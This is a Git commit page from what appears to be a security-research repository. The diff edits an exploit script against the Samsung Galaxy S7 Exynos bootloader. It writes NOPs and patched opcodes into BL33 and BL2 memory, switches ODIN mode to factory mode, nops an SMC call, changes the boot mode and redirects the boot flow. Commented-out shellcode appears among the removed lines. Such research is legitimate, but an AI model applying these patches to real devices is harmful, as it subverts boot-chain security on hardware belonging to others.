EljakimHerrewijnen/Samsung_S7
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Modify usb_recovery boot to boot normally or in another way

Browse Source
This commit is contained in:
Jonathan Herrewijnen 2024-10-24 18:28:39 +02:00
parent d187b06980
commit 3b89bec190
2 changed files with 6 additions and 65 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

71
source/exploit/exploit.py
View File

@ -798,76 +798,17 @@ class ExynosDevice():
# Sends stage 5 (BL33) but returns to debugger after sending.
stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
print_payload = open("/home/jonathan/projects/samsung_s7/source/screen_print/print.bin", "rb").read()
off = stage4.find(bytes.fromhex("fd 7b bd a9 fd 03 00 91 f3 53 01 a9 d4 08 00 d0 f3 03 01 2a a0 17 00 f9"))
stage4 = stage4[off:] + print_payload + stage4[off+len(print_payload):]
# print_payload = open("/home/jonathan/projects/samsung_s7/source/screen_print/print.bin", "rb").read()
# off = stage4.find(bytes.fromhex("fd 7b bd a9 fd 03 00 91 f3 53 01 a9 d4 08 00 d0 f3 03 01 2a a0 17 00 f9"))
# stage4 = stage4[off:] + print_payload + stage4[off+len(print_payload):]
self.send_normal_stage(stage4)
self.connect_device()
self.usb_read(0x200) # GiAs
# # Modify something in BL33
print(self.cd.arch_dbg.state.print_ctx())
print(self.cd.memdump_region(0x8f063710, 0x8))
self.cd.memwrite_region(0x8f063710, struct.pack('>I', 0x53614d74))
print(self.cd.memdump_region(0x8f063710, 0x8))
# Modify USB Recovyer mode string to: NFI Patched BL33
# patch_string = b'\x4e\x46\x49\x20\x50\x61\x74\x63\x68\x69\x6e\x67\x20\x42\x4c\x33\x33'
# self.cd.memwrite_region(0x8f06ab10, patch_string)
# Print state of x30/LR on screen
self.cd.memwrite_region(0x8f063718, struct.pack('>I', 0x61616161))
### ==================== Writing nops to code cave
# Write NOP from 0x8f008cb8 to 0x8f008d14 using self.cd.memwrite
for i in range(0x8f008cb8, 0x8f008d14, 4):
self.cd.memwrite_region(i, b'\x1f\x20\x03\xd5')
#self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x1f2003d5))
# Overwrite the data pointer showing 'USB Recovery Mode' to something else
# self.cd.memwrite_region(0x8f01dc00, struct.pack('>I', 0x24080090))
# Overwrite a str to a something else
# self.cd.memwrite_region(0x8f01dc28, struct.pack('>I', 0xe40300f9))
# Nop initial show usb recovery mode screen function
# self.cd.memwrite_region(0x8f022654, struct.pack('>I', 0x1f2003d5))
self.cd.memwrite_region(0x8f022654, struct.pack('>I', 0xe4ff9fd2))
# Modify a mov function (0xffff into x4). If this is not nopped, or adjusted, the device will crash. But will try to continue booting (?)
self.cd.memwrite_region(0x8f022658, struct.pack('>I', 0x1f2003d5)) #0xe5031daa.
# Overwrite log function to display screen at end of nops
self.cd.memwrite_region(0x8f02265c, struct.pack('>I', 0xbbffff97)) #0xbbffff97
# ==================
# for i in range(0x8f008cd8, 0x8f008cf4, 4):
# self.cd.memwrite_region(i, struct.pack('>I', 0x1f2003d5))
# # Write shellcode to set some contents on x0 to x5 registers
# shellcode = f"""
# // x5 is the address at x0
# mov x5, x0
# mov x0, 0x1234
# mov x1, 0x12
# mov x2, 0xffff
# mov x3, 0xffff
# mov x4, 0xffff
# bl 0x8f025fb8
# // ret
# """
# shellcode = ks.asm(shellcode, as_bytes=True)[0]
# self.cd.memwrite_region(0x8f008cd8, shellcode)
# Nop a adrp towards 0x8f09a000
self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x1f2003d5))
# ODIN MODE to FACTORY mode
self.cd.memwrite_region(0x8f0114f8, struct.pack('>I', 0x82008052))
# Nop a SMC call in BL2
self.cd.memwrite_region(0x02059650, struct.pack('>I', 0x1f2003d5))
# Change bootmode to SDCARD (allow normal booting, if pressing volume up)
self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035))
self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34))
# Jump into a different function that continues the boot flow (different than BL33_LR)
self.cd.restore_stack_and_jump(0x02024e5c)

BIN
source/exploit/ttbr0_el3.pkl
View File

Binary file not shown.